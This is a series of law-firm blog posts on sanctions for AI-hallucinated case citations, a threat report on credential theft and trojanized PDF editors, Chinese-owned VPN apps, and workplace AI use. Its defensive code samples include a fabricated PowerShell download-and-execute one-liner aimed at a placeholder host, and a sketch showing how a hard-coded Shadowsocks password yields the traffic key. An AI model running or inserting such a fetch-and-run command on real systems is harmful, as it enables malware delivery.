In another “hard lesson learned” case, on Monday, February 24, 2025, a federal district court sanctioned three lawyers from the national law firm Morgan & Morgan for citing artificial intelligence (AI)-generated fake cases in motions in limine. Of the nine cases cited in the motions, eight were non-existent.

Although two of the lawyers were not involved in drafting the motions, all three e-signed them before they were filed. After defense counsel raised concerns with the court about the cited cases, the lawyer who drafted the motions admitted to using MX2.law, “an in-house database launched by” Morgan & Morgan, to add case law to the motions. The lawyer told the court that it was their first time using AI in this way. Unfortunately, they failed to verify the accuracy of the AI platform’s output before filing the motions.

To Morgan & Morgan’s credit, the firm withdrew the motions, was forthcoming with the court, reimbursed the defendant for attorney’s fees, and implemented “policies, safeguards, and training to prevent another [such] occurrence in the future.”

The court sanctioned all three lawyers. The attorney who drafted the motions and failed to verify the output was sanctioned $3,000, and the other two who e-filed the motions were sanctioned $1,000 each. A hard lesson learned, although by now all attorneys should be aware of the risks of using generative AI tools for assistance with writing pleadings; this is not the first hard lesson learned by an attorney who cited fake cases in a court filing. Verify any AI-generated material, whether it appears in a court filing or not. In the words of the sanctioning court: “As attorneys transition to the world of AI, the duty to check their sources and make a reasonable inquiry into existing law remains unchanged.”

Cybersecurity firm Expel recently published its 2026 Threat Report, which analyzed over 1,000,000 alerts in its Security Operations Center throughout 2025. The results show that threat actors continue to use compromised credentials to gain access to company systems. The Report highlights the need for companies to educate their employees, on an ongoing basis, about the importance of protecting their usernames and passwords and remaining highly vigilant when asked to divulge them.

According to the Report, more than 68% of reported incidents were identity-based, meaning a threat actor attempted to use an authorized user’s credentials to access a company’s network. Many involved agents that the organization had not authorized, a clear indication that it was not the authorized user trying to log on. In addition, 12% of incidents involved a logon from a suspicious location, suggesting that companies may wish to monitor and block logon attempts from unauthorized locations, including foreign countries.
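
The Report’s emphasis on unauthorized agents and suspicious locations translates naturally into simple alerting logic. Below is a minimal sketch of that idea in Python; the event format, field names, and allow-lists are hypothetical, and most organizations would implement this through their identity provider’s conditional-access rules rather than a custom script.

```python
# Minimal sketch of identity-based logon screening. The log format, field
# names, and allow-lists are hypothetical; real deployments would use an
# identity provider's conditional-access / geo-blocking features instead.

APPROVED_COUNTRIES = {"US", "CA"}  # locations the company authorizes
KNOWN_AGENT_PREFIXES = ("Mozilla/5.0", "CompanyApp/")  # agents real users present

def flag_logon(event: dict) -> list[str]:
    """Return the reasons a logon event looks suspicious (empty if none)."""
    reasons = []
    if event.get("country") not in APPROVED_COUNTRIES:
        reasons.append(f"logon from unapproved location: {event.get('country')}")
    agent = event.get("user_agent", "")
    if not agent.startswith(KNOWN_AGENT_PREFIXES):
        reasons.append(f"unauthorized agent: {agent!r}")
    return reasons

# Illustrative event only -- not real log data.
event = {"user": "jdoe", "country": "KP", "user_agent": "python-requests/2.32"}
for reason in flag_logon(event):
    print(reason)
```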

The Report notes that “fake PDF editors continue to be a major problem.” If users do not have access to a company-sanctioned PDF editor, they may search the Internet for one to make editing a PDF easier. A user who downloads a fake PDF editor like SupremePDF is unaware that it can “install backdoors, hijack users’ browsers, access stored credentials, execute arbitrary code, intercept sensitive information, and download arbitrary payloads.”

According to Expel,

these “PDF editors” are actually trojans, which use their safe-looking outer shell to establish a foothold on your endpoints. The malware maintains persistence, making sure that the software creates a service that runs on the endpoint, keeping the PDF editor running. We often see these editors then used as a backdoor to run malicious code on the host, commonly abusing encoded PowerShell to download a second payload.

Once the second payload is downloaded, the threat actor can move laterally on the network and steal data. Companies may wish to consider providing a sanctioned PDF editor so users are not tempted to find one on the Internet. This is another security tip to pass along, as many unsuspecting users have no idea that threat actors use these tools to gain access to a network.
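
For the technically curious, the “encoded PowerShell” technique Expel mentions typically relies on PowerShell’s -EncodedCommand flag, which accepts a Base64 encoding of a UTF-16LE script and so hides the payload from casual log review. A minimal sketch of how a defender might decode such a command for inspection follows; the sample command line is fabricated for illustration.

```python
import base64
import re

def decode_encoded_command(cmdline: str) -> str | None:
    """Extract and decode a PowerShell -EncodedCommand argument.
    PowerShell expects Base64 over the UTF-16LE bytes of the script."""
    match = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)",
                      cmdline, re.IGNORECASE)
    if match is None:
        return None
    return base64.b64decode(match.group(1)).decode("utf-16-le")

# Fabricated example: encode a download-style one-liner, then decode it back.
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/p2')"
encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(f"powershell.exe -EncodedCommand {encoded}"))
```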

If you haven’t scheduled your annual cybersecurity training yet, now is the time. There are new (and old) schemes that threat actors are using to attack users, and keeping your employees abreast of these schemes heightens their awareness and vigilance, which protects company data.

In a strongly worded order, Judge Julie A. Robinson of the U.S. District Court for the District of Kansas publicly admonished and sanctioned four lawyers representing a plaintiff company in a patent infringement case for using ChatGPT to find case law to support a response to a motion to exclude an expert witness and a response to the defendant’s motion for summary judgment.

In the 36-page order, the court made it clear that not only the lawyer who used AI to generate the hallucinated citations, but also his partners and local counsel bore responsibility for the filing of the motion. This is a clear reminder of the non-delegable duty of lawyers under Rule 11 of the Federal Rules of Civil Procedure. The Court held that “[b]ecause there is no dispute that all five . . . attorneys signed both documents that included these errors, and they admit that not one of them verified that the case law in those briefs actually exist and stand for the propositions for which they were cited, their conduct violates Rule 11(b)(2).”

The brief facts: a seasoned lawyer, admitted pro hac vice, acknowledged to the court that the motion had been prepared using ChatGPT and that it was his first time doing so. He was under personal stress and admitted he was not thinking straight, and although he meant to check the citations before filing the motion, he never did. His partners, although also admitted pro hac vice, were not responsible for the motion, never read it, and did not participate in its preparation. The associate assigned to the case read the motion and made a few changes but was not assigned to check the citations. Local counsel relied on the pro hac vice counsel, reviewed the motion briefly before filing it, but never checked the citations. The court’s order points out that the response to the motion to exclude “contains a litany of problems: (1) nonexistent quotations; (2) nonexistent and incorrect citations; and (3) misrepresentations about cited authority.” Some of the same issues appeared in the response to the motion for summary judgment.

Here’s what the court had to say about each of the attorneys’ responsibilities and the sanctions it assessed:

  • The most culpable lawyer used ChatGPT and failed to check the citations. Although he was experiencing difficulties in his personal life, he never asked for an extension or for help from the other five lawyers representing the plaintiff in the case. Instead, he cut corners by using ChatGPT and filed the response on time, with the deficiencies described above. Neither his co-counsel nor his client was aware of the generative AI use. He was a “novice” at using it and is only now aware of the risks. Although the court was sympathetic to his personal plight (and he graciously emphasized that he was the only one culpable), it stated that “citing to a nonexistent case, attributing a nonexistent quotation to an existing case, and misstating the law violates Rule 11(b).” The violation is the failure to verify the cases, not the intent behind the failure. The court noted that the attorney’s unawareness of the “very real risk of case hallucinations,” after several instances of Rule 11 sanctions levied against lawyers for this same violation, was an aggravating factor. The court directed the attorney to implement a robust policy to “deter any future instance of submitting unverified authority in a filing…[by requiring] him to submit to the Clerk for filing a certificate outlining specific internal procedures at his firm that he intends to impose. . . and imposes a monetary fine of $5,000, . . .and revokes his pro hac vice admission to this Court.” The court further directed the attorney to “self-report to the state disciplinary authorities where he is licensed by providing them with a copy of this Order.”
  • The attorney’s partners, who did not participate in preparing the brief, signed the filing despite failing to determine the accuracy of its contents. One of the partners had assigned an associate to help and was on a family vacation when the brief was filed. The court pointed out that merely affixing their names to the brief without reviewing it “violated [their] duty to conduct a reasonable inquiry into the facts and the law before filing.” The court reiterated that Rule 11 is non-delegable and imposed a fine of $3,000 on each of the co-counsel who signed the pleadings.
  • The court did not sanction the associate assigned to the case, as he had no supervisory authority and “was placed in a difficult position by his supervising attorneys.”
  • As for local counsel, he also signed the defective pleadings, and “by doing so, he vouched for the Texas attorneys in this matter.” He failed to cite-check the pleadings. His firm set forth its efforts to ensure this does not happen again and provided the court with a formal policy on generative AI use, and the attorney “voluntarily sanctioned himself in the form of refraining from serving as sponsoring or local counsel for pro hac vice attorneys for a period of 12 months.” Taking these considerations into account, the court sanctioned local counsel $1,000.

The clear takeaway is that firms need to address the fact that lawyers may be tempted to use GenAI even when they have no experience with it, may not appreciate the consequences, and are dealing with personal issues. Judges have no sympathy when it comes to hallucinations and misrepresentations in briefs: they waste time and resources and clearly violate Rule 11. Ignorance is not a defense, and relying on your partners, co-counsel, or local counsel will not get you off the hook, as Rule 11 is non-delegable. Firms may wish to consider adopting policies and guidance on the use of GenAI tools, requiring every lawyer who signs a pleading to check and verify the cites before affixing their signature. There can be no reliance on others before a pleading is filed.

Continuing the weekly blog posts about lawyers using AI and getting in trouble, the Massachusetts Office of Bar Counsel recently issued an article entitled “Two Years of Fake Cases and the Courts are Ratcheting Up the Sanctions,” summarizing the problems courts have encountered when confronted with lawyers citing fake cases, and the subsequent referrals to disciplinary counsel.

The article outlines multiple cases of lawyers being sanctioned for filing pleadings containing fake cases after using generative AI tools to draft them. The cases range from lawyers not checking the cites themselves to supervising lawyers not checking the cites of the lawyers they supervise before filing.

The article reiterates our professional ethical obligations as officers of the court: that a pleading may be filed only when, “to the best of the attorney’s knowledge, information and belief, there is a good ground to support it”; that “any lawyer who signs, files, submits, or later advocates for any pleading, motion or other papers is responsible for its content”; and that lawyers must properly supervise subordinate lawyers and nonlawyers.

The article outlines two recent sanctions imposed on lawyers in Massachusetts in 2025. The author states, “Massachusetts practitioners would be well-served to read the sanction orders in these matters.” I would suggest that non-Massachusetts practitioners read the article and the sanction orders as well, as the sanctions are similar to those other courts are imposing on lawyers who fail to check the content and cites of pleadings before filing them.

Courts are no longer giving lawyers free passes for being unaware of the risks of using generative AI tools to draft pleadings. According to the article, sanctions will continue to be issued, and practitioners and firms need to address the issue head on.

The article points out several mitigation steps that lawyers and firms can take to avoid sanctions. My suggestion is that lawyers use caution when using AI to draft pleadings, communicate with any other lawyers involved in the drafting to determine whether AI is being used (including if you are serving as local counsel), and check and re-check every cite before filing a pleading with a court.

U.S. District Judge Amit P. Mehta sanctioned an attorney who filed a brief in which every citation was erroneous, after the attorney admitted to relying on generative AI to write it. The attorney had used Grammarly, ProWritingAid, and Lexis’ cite-checking tool. The attorney was ordered to pay sanctions, including opposing counsel’s invoice for fees and costs. The court noted that sanctions were necessary because the attorney had acted “recklessly” and shown “singularly egregious conduct”: they did not verify the citations, and all nine cases cited were erroneous. The court further noted that the lack of verification raised “serious ethical concerns.”

The attorney’s co-counsel was not sanctioned because they indicated they were unaware of the use of generative AI, but they admitted that they had not independently checked and verified the citations, and they underwent questioning by the court.

The sanctioned attorney self-reported the incident to the Pennsylvania Disciplinary Board and filed a motion to withdraw from the case.

This is a hard lesson to learn, and it is not the first time an attorney has been sanctioned by a court for filing hallucinated citations. The message in all of these cases is that attorneys have an ethical obligation to check every cite before filing a pleading with the court and should take extreme caution when using generative AI tools in the brief-writing process.

Similarly, Senator Chuck Grassley, Chairman of the U.S. Senate Judiciary Committee, sent letters to two federal judges this week requesting information about their use of generative AI in drafting orders. According to Grassley, orders entered by the judges in July in separate cases were withdrawn after lawyers flagged factual inaccuracies and other errors in them. Grassley noted that lawyers are facing scrutiny over their use of generative AI, and judges should be held to the same or a higher standard.

The judges have not responded to date.

Courts and their law clerks may wish to consider the same lessons learned by attorneys using generative AI tools. Proceed with caution.

In the ongoing saga of lawyers sanctioned for AI-generated hallucinated citations in pleadings, FIFA and the other defendants in an antitrust lawsuit filed by the Puerto Rico Soccer League recently obtained an order from Chief U.S. District Judge Raul M. Arias-Marxuach requiring counsel for the plaintiff, a now-defunct league, to pay FIFA and the other defendants $24,000 in attorney’s fees and costs “for filing briefs that appeared to contain errors hallucinated by artificial intelligence.” Puerto Rico Soccer League NFP, Corp. v. Federacion Puertoriquena de Futbol, No. 23-1203 (D.P.R. Sept. 23, 2025).

The judge noted that the motions filed by the Puerto Rico Soccer League “included at least 55 erroneous citations,” which required “hours of work on the court’s end to check the accuracy of each citation.” Plaintiffs’ counsel denied using generative AI, but the judge questioned this assertion given “the sheer number of inaccurate or nonexistent citations.” The judge noted that the erroneous citations violated Rule 11 of the Federal Rules of Civil Procedure and applicable ethical rules.

The ordered sanctions are another reminder to lawyers to check and recheck all cases cited in any pleading they file in order to comply with Rule 11.

Researchers at Arizona State University and Citizen Lab have discovered that three families of Android VPN applications, used by millions of people worldwide, are related and owned by companies or individuals located in mainland China or Hong Kong with ties to the People’s Republic of China.

The researchers analyzed numerous VPN apps, including each app’s Java code, security flaws, and number of Google Play Store downloads, and identified three families of VPN providers. The apps in the first group contained identical security flaws, including that they:

  • Collect location-related data (even though their privacy policies say they don’t);
  • Use weak/deprecated encryption; and
  • Contain hard-coded Shadowsocks passwords, which, if extracted, may allow attackers to decrypt user traffic (see the sketch after this list). These hard-coded credentials work across different apps and servers, proving that these providers use the same backend infrastructure.
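
To see why a hard-coded password is so damaging, recall that legacy Shadowsocks configurations derive the encryption key deterministically from the password alone, using OpenSSL’s MD5-based EVP_BytesToKey routine with no salt. Anyone who extracts the string from a decompiled app can compute the same key and decrypt captured traffic. A minimal sketch, with an invented password standing in for an extracted value:

```python
import hashlib

def evp_bytes_to_key(password: bytes, key_len: int) -> bytes:
    """Legacy Shadowsocks key derivation (OpenSSL EVP_BytesToKey: MD5, no salt).
    Deterministic: the password alone fully determines the key."""
    derived = b""
    block = b""
    while len(derived) < key_len:
        block = hashlib.md5(block + password).digest()
        derived += block
    return derived[:key_len]

# Hypothetical stand-in for a password extracted from a decompiled app.
hardcoded = b"not-a-real-password"
print(evp_bytes_to_key(hardcoded, 32).hex())  # identical on every install/server
```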

They found that a single company hosts all of the VPN servers in the second group, and that the VPN apps in the third family “are susceptible to connection interference attacks using the client-side blind in/on-path attacks.”

Significantly, the researchers found that “the providers appear to be owned and operated by a Chinese company (i.e., Qihoo 360) and have gone to great lengths to hide this fact from their 700+ million combined user bases.”

The Tech Transparency Project (TTP) provided an in-depth analysis of Qihoo 360 as a national security threat in its article “Apple Offers Apps With Ties to Chinese Military,” which is well worth the read.

According to the article, “[m]illions of Americans have downloaded apps that secretly route their internet traffic through Chinese companies, according to an investigation by the Tech Transparency Project (TTP), including several that were recently owned by a sanctioned firm with links to China’s military.” They discovered that “one in five of the top 100 free virtual private networks in the U.S. App Store during 2024 were surreptitiously owned by Chinese companies, which are obliged to hand over their users’ browsing data to the Chinese government under the country’s national security laws. Several of the apps traced back to Qihoo 360, a firm declared by the Defense Department to be a ‘Chinese Military Company.’”

They further found that “one Chinese VPN has been advertised on Facebook and Instagram to teens as young as 13, and some have targeted ads at Americans looking to keep using TikTok, another Chinese app threatened with a U.S. ban.”

While the researchers from Arizona State University and Citizen Lab performed an in-depth analysis of the apps owned by Qihoo 360 (finding that the apps had been downloaded over 70 million times), TTP provides more information about Qihoo 360 and its national security risk. According to TTP, Qihoo 360 was placed on the Commerce Department’s Entity List in June 2020 because it “takes part in the procurement of commodities and technologies for military end-use in China.” It was also “designated by the U.S. Department of Defense as a ‘Chinese military company’” operating in the U.S.

Similar to the concerns raised about TikTok and Temu, the free VPN services provided by Qihoo 360 carry risks that users should consider. Research your VPN provider to ensure that it does not have ties to the Chinese Communist government.

We have previously outlined several cases where lawyers have been sanctioned by courts for citing fake cases generated by artificial intelligence (AI), also known as “hallucinations.”

Now, we don’t even have to keep track of the cases to report on them because we found a nifty new database that keeps track of all of them. Did you know that as of this writing, there have been 156 cases where lawyers cited fake cases generated by AI in court documents?

It is hard to believe that, given Rule 11 obligations, any lawyer would file a document with a court without checking the cites. Apparently, it happens more frequently than one would think. Many lawyers have already been sanctioned by courts to send the message that citing fake AI-generated cases wastes the court’s time, as well as the time and resources of opposing counsel and parties.

Kudos to Damien Charlotin, who has created a database to track the growing number of cases in which lawyers have cited AI-generated hallucinated cases. If you want to see how much of a growing problem it is, check it out.

The number of cases keeps growing, and the sanctions continue to get larger and more punitive. Lawyers need to learn quickly that they must follow their ethical obligations and cite actual cases, with citations checked and Shepardized with human oversight, before filing a pleading. It is truly shocking that lawyers have failed to do so in 156 instances thus far.

A new survey from Intapp, titled “2025 Tech Perceptions Survey Report,” summarizes findings from a survey of fee-earners and reports a “surge in AI usage.” The professionals surveyed work in the accounting, consulting, finance, and legal sectors. Findings include that “AI usage among professionals has grown substantially, with 72% using AI at work versus 48% in 2024.” AI adoption among firms increased to 56%, with firms utilizing it for data summarization, document generation, research, error-checking, quality control, voice queries, data entry, consultation (decision-making support), and recommendations. Adoption is highest in finance, where 89% of professionals use AI at work, compared with 73% of accounting professionals, 68% of consulting professionals, and 55% of legal professionals.

A significant conclusion is that when firms do not provide AI tools, professionals often find their own: over 50% have used unauthorized AI tools in the workplace, which increases risk for companies. Professionals are reallocating the time saved with AI tools to improve work-life balance, focus on higher-level client work, pursue strategic initiatives and planning, cultivate client relationships, and increase billable hours.

The survey found that professionals want and need technology to assist with tasks, yet only 32% believe they have the optimal technology to complete their jobs effectively. The conclusion is that professionals who are given optimal technology are more satisfied and more likely to stay at the firm, that optimal tech “powers professional- and firm-success,” and that AI is becoming non-negotiable for future firm leaders.

AI tools are rapidly developing and being adopted across all industries, including the professional sectors. As the Intapp survey notes, if firms do not provide AI tools for workers to use in their jobs, workers will use them anyway. The survey reiterates how important it is to have an AI Governance Program in place that provides sanctioned tools to workers, reducing the risks associated with unauthorized AI tools. Developing and implementing an AI Governance Program and acceptable use policies should be high on the priority list for all industries, including professional services.

A new study by Ivanti finds that one out of three workers secretly use artificial intelligence (AI) tools in the workplace. They do so for varying reasons, including “I like a secret advantage,” “My job might be reduced/cut,” “My employer has no AI usage policy,” “My boss might give me more work,” “I don’t want people to question my ability,” and “I don’t want to deal with IT approval processes.”

In 2025, a staggering 42% of employees admit to using generative AI (GenAI) tools at work. Another whopping 48% of employees admit to feeling resenteeism (disliking one’s job but staying anyway), and 39% admit to presenteeism (coming into the office to be seen while not being productive).

The secret use of GenAI tools in the workplace poses several risks for organizations, including unauthorized disclosure of company data and/or personal information, cybersecurity risks, bias and discrimination, and misappropriation of intellectual property.

The Ivanti study emphasizes the need for organizations to adopt an AI Governance Program so that employees feel comfortable using approved, sanctioned AI tools rather than keeping their use a secret. Such a program also allows the organization to monitor employees’ use of AI tools and to implement guidelines and guardrails around their safe use, reducing risk.